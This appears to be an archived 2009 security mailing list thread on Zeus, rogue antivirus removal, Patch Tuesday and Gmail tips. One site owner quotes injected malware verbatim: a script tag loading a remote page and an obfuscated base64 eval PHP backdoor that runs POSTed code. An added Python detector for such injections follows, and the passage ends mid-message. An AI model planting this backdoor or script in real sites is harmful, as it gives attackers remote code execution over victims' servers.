spyware · PC and Internet Security Mailing List
#5294 From: amy.licious
Date: Sat Oct 3, 2009 10:05 pm
Subject: Re: Banking Trojan Evades AntiVirus Software
amy.licious
 
Brian~

In Trusteer dot com's PDF, it goes into details.

The answer to your question is that the research so far shows this type of
malware to be "equally prevalent in Windows and Unix-based systems."

So they confirm it, but they don't break out the differential figures by
operating system types. At least, not to the public.

~Amy:)

--- In spyware@yahoogroups.com, b <ercoupeflyer@...> wrote:
>
> This is a very interesting problem,
>
>    Is there a break down between windows and mac OS(BSDunix) available for
this problem?
>
> Brian
>
> --- On Sun, 9/20/09, amy.licious <no_reply@yahoogroups.com> wrote:
>
> From: amy.licious <no_reply@yahoogroups.com>
> Subject: [spyware] Banking Trojan Evades AntiVirus Software
> To: spyware@yahoogroups.com
> Date: Sunday, September 20, 2009, 2:51 PM
>
> This is this week's update into on-going research done by security firm
> Trusteer dot com into electronic banking fraud. Trusteer's primary business is
> in securing financial institutions' online interactions with their clients and
> the broader online retail / consumer space. Take a look at the site if this
> subject interests you. CTO Amit Klein spearheads Trusteer's research efforts.
> Management, the Board and the Oversight Committee of Trusteer has a pretty
> impressive pedigree (for a bunch of hackers, that is :P). ~A:)
>
>
>
> +++++
>
>
>
> Darknet.org.uk spilled these bits on Friday~
>
>
>
> Nasty Trojan Zeus Evades Antivirus Software
>
>
>
> This is one nasty piece of malware, seems like it’s working on a low
level as per rootkits, there aren’t many technical details but it may
well be operating on a Ring 0 level.
>
>
>
> The level of detection by AV software is quite scary, especially since the
malware is specifically targeting bank login details and it has the ability to
intercept the browser process.
>
>
>
> Definitely one to watch out for in your organization.
>
>
>
> One of the world’s nastiest password-stealing trojans evades detection
by the majority PCs running anti-virus programs, according to a study that
examined 10,000 machines.
>
>
>
> Zeus, a stealthy piece of malware that sits on a PC and waits for users to log
in to bank websites, is detected just 23 per cent of time by AV programs,
according to the study [PDF] released by security firm Trusteer. Even AV
programs with up-to-date malware signatures were unable to identify the
infection a majority of the time, the authors said.
>
>
>
> Zeus, which also goes by the name Zbot and PRG, escapes detection using
sophisticated techniques such as root-kit technology, the Trusteer report said.
The company is able to detect it by examining the fingerprint Zeus leaves when
it penetrates an infected PC’s browser process.
>
>
>
> It seems to be operating on a level that the AV engines can’t even
detect as when installed with the latest signatures they still can’t
alert a user they are infected.
>
>
>
> It’s time AV engines get a little more advanced and hook into important
processes like the browser and ensure they aren’t being tampered with or
monitored.
>
>
>
> Some kind of active memory protection must be possible.
>
>
>
> A recent report estimated that Zeus is the No. 1 trojan, with 3.6 million
infections in the US alone, or about 1 per cent of the installed base of PCs.
Trusteer’s study, which found Zeus accounted for 44 per cent of the
banking malware infections, was consistent with that finding. After sneaking
onto a PC, it sits quietly in the background until a user logs on to a financial
website. It then sends the login credentials to a remote server in real time,
sometimes by use of instant messaging programs.
>
>
>
> Of Zeus-infected machines, about 31 per cent don’t run AV at all and 14
percent run AV that’s out of date. The remaining 55 per cent had AV
programs that were up to date.
>
>
>
> Sitting at number 1 trojan this is a serious issue, especially with the
stealthy mode in which it operates it looks like it’s going to be hard to
stop the infections.
>
>
>
> I hope someone comes up with a tool or method to detect and prevent these
infections.
>
>
>
> Source: The Register
>
> [Non-text portions of this message have been removed]
>

#5295 From: b <ercoupeflyer@...>
Date: Sat Oct 3, 2009 2:52 am
Subject: Re: Java script attack zombie maker
ercoupeflyer
 
Well, it finally happened: after all these years I was hacked by a Windows box on
my own network.

Here's what happened:

Someone here hit a web site that used Java script to try to do a brute force
attack against several universities. My ISP received email from them, and shut
down my INTERNET access. I found the offending machine on my network and turned
it off. It also tried to hack my mail server, making cyrus run at 100%. Antivirus
did not even detect it at all. I noticed my network getting slow and started
checking, and at the same time, I had pnp enabled on my router; the virus
propped open a port using that, which stayed open until I turned off PNP. They
used the access to also use zombie machines from all over the world to try and
brute force login to my ssh server as root. This also caused network problems.
It even managed to open multiple attacks all at one time against the Cal Poly
site!!

Darn, I have of course moved my ssh service to another random port, removed the
tell and blocked outgoing requests to servers on port 22! Closed the imap port
and enabled only local access to it, or through squirrel mail on the web... Umm,
anyone else seen this yet?

Oh, and made sure the link scanner was turned on on the Windows machine..... I
really hate Microsoft... jeez, turns out though that the link scanner was
active when checked and did not flag the website...


Brian

--- On Thu, 10/1/09, spyware@yahoogroups.com <spyware@yahoogroups.com> wrote:

From: spyware@yahoogroups.com <spyware@yahoogroups.com>
Subject: [spyware] File - Monthly Message to Mailing List Members
To: spyware@yahoogroups.com
Date: Thursday, October 1, 2009, 4:13 AM

To all Spyware Mailing List members -

This is a monthly informational message to all members that provides basic
information about the mailing list.

Purpose of this Mailing List
----------------------------
This group is a PC and Internet Security Mailing list dedicated to providing
news and updated tools against spyware, adware, malware, virus, trojans, worms,
spam and other computer pests... by both removing and preventing them, on any
platform (Windows, MacOS, Linux, etc.). We welcome new members! This group is
moderated.

Posting Messages
----------------
Any member can post a message to the list by sending email to
spyware@yahoogroups.com. The following rules apply to posted messages:

a) BE KIND - Harassing other members, web team, moderators, the administration,
being rude, posting multiple messages with nonsense, running promotional ads
and/or spamming will just get you banned. No name calling, no vulgar language,
no promotion or links to offtopic sites.

b) NO SPAMMING! NO OFFTOPIC! NO WAREZ! NO TROLLING! - Do not use this mailing
list to promote pyramid schemes and other commercial sites. This includes
position openings by headhunters and recruiters. Also no discussion of illegal
activities such as software piracy and other intellectual property violations
will be allowed at all.

c) THINK BEFORE YOU POST - Unlike other mailing lists we do not entertain random
blobs of scribbles and nonsense, be constructive in what you have to say. Do not
post the same message on multiple threads, this is a form of spamming. Do not
hold at ransom other members that don't share your opinion.

d) NO NEGATIVITY, RACIAL OR POLITICAL STANCES - We believe that everyone is
entitled to their own point of view, but this does not mean that you have to
become negative, rude, distasteful, etc. Adding to this mailing list your
Anti-Microsoft, Anti-Apple, or Anti-Linux sentiment is NOT TOLERATED in the
LEAST! We are not saying you have to believe in what anyone says, but you do
need to respect their view(s). It is okay to be disagreeable so long as it is
done in a polite way.

e) BE ACTIVE - What is the point of joining a community to say nothing? Please
reply and contribute to the conversations. :)

f) EMAILS FROM US - We may send you newsletters about updates to this mailing
list. If you don't wish to receive emails from us, please edit your membership
by choosing how you want messages to be delivered. There are 4 options:
'Individual emails' (sends individual email messages), 'Daily digest' (sends
many emails in one message), 'Special notices' (only sends important update
emails from the group moderators) and 'No email' (will not send emails, you'll
need to read the messages at the Web site).

g) NO PATCH, NO FLAWS - We moderators believe any security flaws should only be
posted when a solution/patch has been already released.

h) NO ATTACHMENTS - Attachments to messages are automatically removed.

Replying to Messages
--------------------
The mailing list has been set up so that replies to messages are sent to the
entire list. If you wish to reply only to the poster, be sure that you send only
private mail to that person.

Before sending a reply to everyone in the mailing list, ask yourself, "is my
response of interest only to the person to whom I am replying, or is my response
of general interest?"

Changing Email Options
----------------------
The following options are available:

* Individual E-mails. Every posting will arrive in your inbox as a separate
message.

* Daily digest. You will receive one e-mail message per day with all of the
day's postings.

* Special Notices. You will receive only administrative messages sent from the
mailing list owner.

* No Email. Select this option if you need to temporarily stop receiving email
messages. You can still view messages by going to the group's website at
http://groups.yahoo.com/group/spyware

To edit your e-mail options, go to http://groups.yahoo.com/group/spyware ,
join and select the desired option in the Message Delivery section. Then, press
Save Changes button.

Joining the Mailing List
------------------------
Any person can become a member by performing any of the following:

A. joining directly at http://groups.yahoo.com/group/spyware

B. sending e-mail to spyware-subscribe@yahoogroups.com

C. accepting an invitation e-mail

An invitation e-mail can be sent by any current member of the mailing list. The
invitation is sent by clicking the "invite" link found on home page (
http://groups.yahoo.com/group/spyware ).

All memberships are approved automatically. A copy of the mailing list rules is
sent to each new member.

Leaving the Mailing List
------------------------
Any member may remove him/herself from the mailing list by sending e-mail to
spyware-unsubscribe@yahoogroups.com

Contacts
--------
Any mailing list member may send e-mail directly to the mailing list owner by
sending to spyware-owner@yahoogroups.com

Thank you for your time.

- the admin

[Non-text portions of this message have been removed]

#5296 From: spyware@yahoogroups.com
Date: Tue Oct 13, 2009 6:50 am
Subject: [ Patch Tuesday ] Microsoft security patches available today, 10/13/2009, 12:00 am
spyware@yahoogroups.com
 
Reminder from:   spyware Yahoo! Group
 
Title:   [ Patch Tuesday ] Microsoft security patches available today
 
Date:   Tuesday October 13, 2009
Time:   All Day
Repeats:   This event repeats every month on the second Tuesday.
Notes:   Patch Tuesday is the second Tuesday of each month, the day on which Microsoft releases security patches. You are advised to run Windows Update today.
 

#5297 From: Steven Plisk <steve@...>
Date: Tue Oct 13, 2009 8:50 pm
Subject: Re: [ Patch Tuesday ] Microsoft security patches available today, 10/13/
ssp67047
 
That was the mother of all updates. Apparently today's security patch was the
biggest ever released by Microsoft.

It's interesting that they still include their malicious software removal tool,
especially now that their new "Security Essentials" freeware suite is available.
I wonder what functions the malware tool performs that the new program doesn't?

Regards,

Steven Plisk


[Non-text portions of this message have been removed]

#5298 From: "queastellyeah" <queastellyeah@...>
Date: Tue Oct 20, 2009 3:45 am
Subject: PLEASE Help me!!!!!!!
queastellyeah
 
Hello everyone. I think that this group may be an answer to my prayers. I have
this thing called "Alpha Antivirus" and it makes me want to hurt people.....
lol. It keeps giving me pop ups, and my only option is to buy. Well I don't want
to buy it, and I'm not going to. I spent six hundred bucks on this laptop which
ran great, and this thing cut its speed in half. The thing is that I can't delete
it at all, so I went online and looked it up, only to find out that it's some
kind of spyware. The site that I went to offered what they called the cure
all, however, the thing would never download because the file was corrupt or
something. I joined this group that I may learn how to get rid of this thing and
prevent future cases. I would be VERY grateful to anyone who might tell me how
to rid my system of this nonsense, and what I need to do to keep it fast like it
was. I thank you all so very much.

By the way...
Inspiron 1501 laptop
running Vista Home Basic

Your friend Queastellyeah,

#5299 From: glenn <glennrex@...>
Date: Tue Oct 20, 2009 10:03 am
Subject: PLEASE Help me!!!!!!!
glennrex
 
reinstall os, then we can make a list of what u need


[Non-text portions of this message have been removed]

#5300 From: biksham
Date: Tue Oct 20, 2009 9:26 pm
Subject: My website is hacked by some body, please help me.
biksham
 
Hello there,
     I have a website called eBlueFox.com. For 3 weeks somebody has been hacking
my website and adding some kind of virus. My website files are in PHP and HTML
code. They are adding the following code in PHP and HTML files.

1) If it's an HTML file, then they add the following code before the <body> tag:
<script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>.

2) If it's a PHP file, then they add the following code before the first line
of code.

<?php
eval(base64_decode('aWYoIWlzc2V0KCRqemk5ODEpKXtmdW5jdGlvbiBqemk5OCgkcyl7\
aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlm\
b3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXBy\
ZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYp\
fHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0\
Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8\
fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwn\
Jywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8o\
aHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihw\
cmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxz\
Kjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2Uo\
JyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3Ry\
X3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJS\
eUxXMW9ZWE5vYVcwdVkyOXRMME52Ym5SaFkzUlZjeTl0ZVdGc1luVnRMbkJvY0NBK1BDOXpZ\
M0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFj\
ZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykp\
JHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24ganppOTgyKCRhLCRiLCRjLCRkKXtnbG9iYWwg\
JGp6aTk4MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkanppOTgxKSljYWxsX3Vz\
ZXJfZnVuYygkanppOTgxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEp\
IGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2p6aTk4JylyZXR1cm47ZWxzZWlmKCRhPT0n\
b2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1\
dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRz\
WyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2p6\
aTk4Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7\
ZWNobyAkc1skaV1bMV07fX19JGp6aTk4bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignanpp\
OTgyJykpIT0nanppOTgyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10p\
KTs=')); ?>

3) Before, they were adding "<iframe" some etc... code before the body
and end of the file. But they changed the strategy. I
keep on cleaning, and so far I did it 5 times.
4) I've talked to the hosting company (godaddy.com) support group. They
said their servers are very secured and there is something I need to
control. I don't understand what I should do. It's driving me crazy.
5) Somebody suggested that I change the file permission to read only. I
did that one too. But no luck; next day he is changing the file
permission to "read, write, and execute" and added spam.
   Please..please.. help me to stop the spam.

   Thank you, and I would appreciate your help.

   Reg
   Bunny.





[Non-text portions of this message have been removed]

#5301 From: "Sing Lin, Ph.D." <singhlin@...>
Date: Tue Oct 20, 2009 2:21 pm
Subject: RE: PLEASE Help me!!!!!!!
singhlin
 
Try the easy method first by using the "Restore" function in Vista OS to
restore Vista back to a restore point some day before you got this "Alpha
Antivirus" into your PC to see if Restore eliminates the problem. If not,
then consider other more drastic method.



Sing Lin








[Non-text portions of this message have been removed]

#5302 From: "ercoupeflyer" <ercoupeflyer@...>
Date: Thu Oct 22, 2009 11:40 pm
Subject: Re: PLEASE Help me!!!!!!!
ercoupeflyer
 
Load Linux onto your pc and be forever free!

OK so I exaggerate ,

Have you tried slipping the disk out and using another pc, and a good antivirus
to scan it(AVG works very well), it makes the process a whole lot easier!!

You can also download
onto a usb drive
boot it on your laptop and run clamav to scan after updating from calm site.

Cheers




#5303 From: "ercoupeflyer" <ercoupeflyer@...>
Date: Thu Oct 22, 2009 11:51 pm
Subject: Re: My website is hacked by some body, please help me.
ercoupeflyer
 
1) Ensure you have a good antivirus on your personal local computer, and that
there is no spy running on your computer before you access your web page. Be
sure to always use https or secure password when accessing the site.

2) Change all your passwords at once for your web site. Ensure you do in fact
have a password for your website admin.
GoDaddy is very secure in preventing access to OS etc., but not badly managed
pages.

3) Make sure you have added the security file .htaccess to all of your
directories on your website which prevents access/writing. Make sure PHP is not
in debug mode.

4) Make all files read only or rx.

5) Check the log files to see who is hacking or attempting to hack your site and
notify the service provider of the IP, ask to shut it down (this probably will
fall on deaf ears, but at least you let someone know!).


#5304 From: biksham
Date: Sat Oct 24, 2009 8:39 pm
Subject: Re: My website is hacked by some body, please help me.
biksham
 
Hi there,
       First I would like to thank you for your reply.
1) I have AVG software on my PC, which I purchased recently after I got
attacked.
2) I changed the passwords for all of my ftp accounts.
3) How would I check whether my PHP is running in debug mode or not? I did
not have .htaccess in all the directories.
Could you please let me know how to set up the .htaccess file?
4) I did change all the file permissions to "read" only but he is changing
them to write.
5) How do I figure out who is hacking my site in the log file? I've checked my
log file but I don't see that. Could you please give me more information
about the log file?

Note: I changed all my ftp passwords and am not accessing ftp accounts from
home computers; since then they did not attack.
Let's see whether they are going to come back or not.

Thanks again.
Bunny.


#5305 From: "ccdogpark@..." <ccdogpark@...>
Date: Sat Oct 24, 2009 7:54 pm
Subject: Re: My website is hacked by some body, please help me.
ccdogpark
 
I just googled for "dr-mhashim.com"
and most of the websites that list that
text are Arabic but this website below
lists it as a known virus site.

http://hosts-file.net/?s=Download&f=Partial

"IMPORTANT: Many of the sites listed in this
database WILL INFECT your computer. DO NOT
visit them if you do not know what you are
doing."

Unquote

But your website is not listed for some reason.

WRZ



--- In spyware@yahoogroups.com, biksham <no_reply@...> wrote:
>
> Hello there,
>     I have a website called eBlueFox.com. Since 3 weeks some body hacking
> my website
> and adding some kind of virus. My website files are in php and html
> code.
> They are adding following code in php and html files.
>
> 1)If its html file then adding the following code before <body> tag
> <script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>.
>
> 2) If its php file then adding the following code before the first line
> of code.

<snip>

#5306 From: "rjgoverna" <rjgoverna@...>
Date: Mon Oct 26, 2009 9:12 am
Subject: Spyware Group's 6th Anniversary !
rjgoverna
 
Six years ago (26th of October 2003) the Spyware Group was launched on this
Yahoo style mailing list and it has been an exciting and educational experience
for us all. During this time we've seen a great deal of activity here, including
the very rapid approach of the joining of our two-thousandth member (That is
likely to be just a few weeks away now).

The Moderating Team would like to thank all of you for participating in this
mailing list and for helping us to reach this new milestone. Whether you are a
recent member or a long time participant, we want you all to know that we've
enjoyed serving your computing security needs and we hope to continue doing so
well into the future!

Thank you again for your participation!

The Mods

#5307 From: amy.licious
Date: Mon Oct 26, 2009 10:31 pm
Subject: Re: [ Patch Tuesday ] Microsoft security patches available today, 10/13/
amy.licious
 
LOL Yes indeed, Steven! It was a great "sending off party" for Windows 7 ~ that
would be "Vista Mach II for Business" that businesses are now essentially
"forced" to buy and thus make it acceptable to consumers as well. (but the
expensive versions called 7 Professional, 7 Business, 7 Ultimate and 7
Enterprise come, strangely enough, equipped with the XP downgrade! :p).

It truly was mammoth, however, many of the Critical and Important updates did
not really apply to the Windows operating system. They applied to a browser
which few people use anymore, an Office Set of programs that also aren't very
popular anymore, a developer's base known as NET Framework which unfortunately
developers are kind of forced to deal with and the NET component that'll compete
with Adobe Creative Essentials called Silverlight.

The one program that connects all of these others together has been around for
more than a decade, the famous ActiveX component of IE. Do we really need
ActiveX? Not in the slightest.

So why does it stick around? I don't really know. People always ask why doesn't
Microsoft kill ActiveX in a browser update? Well, maybe, Redmond's trying slowly
but surely with the mammoth updates but it's gonna be hard with ActiveX coded
back light years in Windows.

~Amy:)

--- In spyware@yahoogroups.com, Steven Plisk <steve@...> wrote:
>
> That was the mother of all updates. Apparently today's security patch was the
> biggest ever released by Microsoft.
>
> It's interesting that they still include their malicious software removal
> tool, especially now that their new "Security Essentials" freeware suite is
> available. I wonder what functions the malware tool performs that the new
> program doesn't?
>
> Regards,
>
> Steven Plisk
>
>
> [Non-text portions of this message have been removed]
>

#5308 From: b <ercoupeflyer@...>
Date: Tue Oct 27, 2009 6:51 pm
Subject: Re: Re: My website is hacked by some body, please help me.
ercoupeflyer
 
.htaccess is documented on the apache web site documentation, It will give you
all the information you need.

php is in debug mode when a flag is set in the php config file, if you don't have
access to it, you don't have to worry, but check your directories for something
like php5.conf etc..

make sure debug level logging is turned on for your web server then review the
access log, looking for ip address at the time of the change, then you do a
lookup to see where it is coming from, you can do two things, direct that
address in your website using .htaccess to the FBI/NSA/DARPA web site, or some
tracking website... it's fun to get even and may scare him to stop.

I suspect from your comment that your home computer was hacked or you accessed
your web site admin from a public computer and they got your password from that!

Sorry to take too long getting back to you

Brian

--- On Sat, 10/24/09, biksham <no_reply@yahoogroups.com> wrote:

From: biksham <no_reply@yahoogroups.com>
Subject: [spyware] Re: My website is hacked by some body, please help me.
To: spyware@yahoogroups.com
Date: Saturday, October 24, 2009, 1:39 PM

Hi there,

First I would like to thank you for your reply.

1) I've AVG software on my pc which I've purchased recently after I got
attacked.
2) I changed the passwords for all of my ftp accounts.
3) How would I check whether my php is running debug mode or not? I did
not have .htaccess in all the directories.
Could you please let me know how to setup the .htaccess file.
4) I did change all the file permission to "read" only but he changing
write.
5) How to figure out who is hacking my site in log file. I've checked my
log file but I don't see that. Could you please give me more information
about the log file.

Note: I changed my all ftp passwords and not accessing ftp accounts from
home computers, since then they did not attack.
Let see whether they are going to come back or not.

Thanks again.

Bunny.

--- In spyware@yahoogroups.com, "ercoupeflyer" <ercoupeflyer@...> wrote:
>
> 1) ensure you have a good antivirus on your personal local computer,
> and that there is no spy running on your computer before you access
> your web page, be sure to always use https or secure password when
> accessing the site.
>
> 2) change all your passwords at once for your web site. ensure you do
> in fact have a password for your website admin.
> godaddy is very secure in preventing access to os etc, but not badly
> managed pages.
>
> 3) make sure you have added the security file .htaccess to all of your
> directories on your website which prevents access/writing. Make sure php
> is not in debug mode..
>
> 4) make all files read only or rx
>
> 5) check the log files to see who is hacking or attempting to hack
> your site and notify the service provider of the ip, ask to shut it
> down,(this probably will fall on deaf ears, but at least you let someone
> know!
>
> --- In spyware@yahoogroups.com, biksham no_reply@ wrote:
> >
> > Hello there,
> >     I have a website called eBlueFox.com. Since 3 weeks some body hacking
> > my website
> > and adding some kind of virus. My website files are in php and html
> > code.
> > They are adding following code in php and html files.
> >
> > 1)If its html file then adding the following code before <body> tag
> > <script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>.
> >
> > 2) If its php file then adding the following code before the first line
> > of code.
> >
> > <?php
> > eval(base64_decode('...')); ?>

> >
> > 3) Before they were adding "<iframe" some etc... code before the body
> > and end of the file. But they changed the strategy. I'm
> > keep on cleaning and So far I did 5 times.
> > 4) I've talked to the hosting company (godaddy.com) support group. They
> > said their servers are very
> > secured and there is some thing I need to control. I don't understand
> > what should I do. It's driving me crazy.
> > 5) Some body suggested me to change the file permission to read only. I
> > did that one too. But no luck, next day
> > he is changing the file permission to "read,write, and execute" and added
> > spam.
> >   Please..please.. help me to stop the spam.
> >
> >   Thank you and I would appreciate for your help.
> >
> >   Reg
> >   Bunny.
> >
> > [Non-text portions of this message have been removed]
> >
>

[Non-text portions of this message have been removed]
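
An added example (not part of any post in this thread) of the two checks discussed above: finding files that carry the injected code biksham describes, then listing access-log requests made around each file's modification time, as Brian suggests. The function names, sample files, IP addresses and log lines are constructed for illustration, and Apache's combined log format is assumed.

```python
import os
import re
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path

# PHP file whose first statement is eval(base64_decode(...)), as described in the thread.
PHP_INJECT = re.compile(rb"\A\s*<\?php\s*eval\s*\(\s*base64_decode\s*\(", re.I)
# External <script src=http://...></script> placed directly before the <body> tag.
HTML_INJECT = re.compile(
    rb"<script\s+src\s*=\s*[\"']?https?://[^\s\"'>]+[^>]*>\s*</script>\s*<body", re.I)
# Apache combined log format (assumed): ip ident user [time] "method url proto" status
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')


def scan_webroot(root):
    """Return (relative path, finding, mtime in UTC) for each file that matches."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in (".php", ".html", ".htm"):
            continue
        data = path.read_bytes()
        if PHP_INJECT.search(data):
            finding = "eval(base64_decode( at top of file"
        elif HTML_INJECT.search(data):
            finding = "external script before <body>"
        else:
            continue
        mtime = datetime.fromtimestamp(path.stat().st_mtime, tz=timezone.utc)
        hits.append((path.relative_to(root).as_posix(), finding, mtime))
    return hits


def requests_near(log_lines, when, minutes=5):
    """Return (ip, method, url, status) for log entries within +/- minutes of when."""
    window = timedelta(minutes=minutes)
    found = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the assumed format
        ip, stamp, method, url, status = m.groups()
        try:
            seen = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        except ValueError:
            continue
        # Both values are timezone-aware, so server-local offsets compare correctly.
        if abs(seen - when) <= window:
            found.append((ip, method, url, int(status)))
    return found


def build_sample(root):
    """Create constructed sample files under root; return constructed log lines."""
    changed = datetime(2009, 10, 20, 3, 14, 0, tzinfo=timezone.utc).timestamp()
    older = datetime(2009, 9, 1, 12, 0, 0, tzinfo=timezone.utc).timestamp()
    files = {
        "index.html": (changed, b"<html><head></head>\n"
                       b"<script src=http://injected.example/x.php ></script>\n"
                       b"<body>hi</body></html>"),
        "contact.php": (changed, b"<?php\neval(base64_decode('Y29uc3RydWN0ZWQ=')); ?>\n"
                        b"<?php echo 'contact'; ?>"),
        # Clean files: a script in <head>, and a harmless use of base64_decode.
        "about.html": (older, b"<html><head><script src=\"http://cdn.example/a.js\">"
                       b"</script></head><body>ok</body></html>"),
        "lib/util.php": (older, b"<?php function d($s) { return base64_decode($s); } ?>"),
    }
    for rel, (mtime, body) in files.items():
        path = Path(root) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(body)
        os.utime(path, (mtime, mtime))
    return [
        '198.51.100.7 - - [19/Oct/2009:20:13:30 -0700] "POST /admin/login.php HTTP/1.1" 200 512',
        '203.0.113.9 - - [20/Oct/2009:03:16:45 +0000] "GET /index.html HTTP/1.1" 200 1043',
        '192.0.2.44 - - [20/Oct/2009:09:00:00 +0000] "GET / HTTP/1.1" 200 1043',
        'not a log line',
    ]


def demo():
    """Scan the constructed webroot and pair each finding with nearby requests."""
    with tempfile.TemporaryDirectory() as root:
        log = build_sample(root)
        return [(rel, finding, requests_near(log, mtime))
                for rel, finding, mtime in scan_webroot(root)]


if __name__ == "__main__":
    for rel, finding, reqs in demo():
        print(rel, "-", finding)
        for req in reqs:
            print("   ", *req)
```

If the files were changed over FTP with a stolen password, as Brian suspects, the web access log will show nothing unusual at the modification time and the host's FTP log is the one to request.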

#5309 From: "Madd Hatter" <maddhatter53@...>
Date: Tue Oct 27, 2009 3:59 pm
Subject: RE: Re: PLEASE Help me!!!!!!!
maddhattertom
 
Try this: Using an uninfected computer, go here: http://www.ubcd4win.com/
Download The Ultimate Boot CD for Windows, Burn it to disk, Boot from CD on
your infected PC and use the utilities on the boot CD to remove the
offending program. Once you have booted your infected PC the program will be
loaded into memory and will not allow you to remove it. The UBCD4Win
bypasses this.

--- In spyware@yahoogroups.com, "queastellyeah" <queastellyeah@...> wrote:
>
> Hello everyone. I think that this group may be an answer to my prayers. I
> have this thing called "Alpha Antivirus" and it makes me want to hurt
> people..... lol. It keeps giving me pop ups, and my only option is to buy.
> Well I don't want to buy it, and I'm not going to. I spent six hundred bucks
> on this laptop which ran great, and this thing cut its speed in half. The
> thing is that I can't delete it at all, so I went online and looked it up,
> only to find out that it's some kind of spyware. The site that I went to
> offered what they called the cure all, however, the thing would never
> download because the file was corrupt or something. I joined this group that
> I may learn how to get rid of this thing and prevent future cases. I would
> be VERY grateful to anyone who might tell me how to rid my system of this
> nonsense, and what I need to do to keep it fast like it was. I thank you all
> so very much.
>
> By the way...
> Inspiron 1501 laptop
> running Vista Home Basic
>
> Your friend Queastellyeah,
>





[Non-text portions of this message have been removed]

#5310 From: amy.licious
Date: Sat Oct 31, 2009 8:51 pm
Subject: GMail Account Security Tips
amy.licious
 
If you use GMail, you might want to follow Google's GMail Blog which gives
useful security tips and highlights upcoming programs still in development at
Google Labs. Google tends to fly fast and free with new program debuts, so
novice and intermediate users should be careful to stay away from BETA programs
on their primary systems.  ~A:)

Gmail account security tips
Tuesday, October 27, 2009 1:24 PM
Posted by Sarah Price, Online Operations Strategist

As part of National Cyber Security Awareness Month, we recently posted about how
to pick a smart password. Having a strong password goes a long way in helping to
protect your data, but there are a number of additional steps you can take to
help you keep your Gmail account secure:

1. Remember to sign out. Especially when using a public computer, be careful to
sign out of your Google account when you're finished. Just click the "Sign out"
link at the top right corner of your inbox. If you're using a public or shared
computer and want to be extra thorough, you can also clear the browser's cache,
cookies and history. Then, completely close the browser. On your personal
computer, you can also lock your computer with a password-protected screensaver
if you need to step away momentarily. Learn the best ways to lock your screen in
Windows or in Mac OS X. Forgot to sign out? Open up a new Gmail session on
another computer and use Gmail's remote sign out feature to close any sessions
that might still be open elsewhere.

2. Be careful about sending certain sensitive information via email. Once you
send an email, you're no longer in control of the information it contains. The
recipients, if they so choose, could forward the email or post its contents in a
public place. Even if you know and trust the people you're emailing, that
information may become exposed if their accounts become compromised or they get
a virus on their machines. As a rule of thumb, should you need to provide a
credit card number or financial account number to respond to a message, provide
it over the phone or in person - not over email. And never share your password
with anyone. Google does not email you to ask you for your password, your social
security number, or other personal information - so don't send it!

3. Enable "Always use HTTPS." Any time you visit a webpage, your computer needs
to send and receive information across the Internet. HTTPS is used to encrypt
data as it is transmitted between computers on the Internet, so look for the
"https" in the URL bar of your browser to indicate that the connection between
your computer and Gmail's servers is encrypted. We use HTTPS on the Gmail login
page, and you can choose to protect your entire Gmail session with HTTPS as
well. HTTPS can make your mail slower, so we let you make the choice for
yourself. Open Settings and choose "Always use HTTPS" on the General tab if you
want to turn it on.

4. Be wary of unexpected attachments. To help protect you from viruses and
malware, Gmail automatically scans every attachment when it's delivered to you,
and again each time you open a message. Attachments you send are also scanned.
That said, no system is foolproof, so if you happen to get an email from a
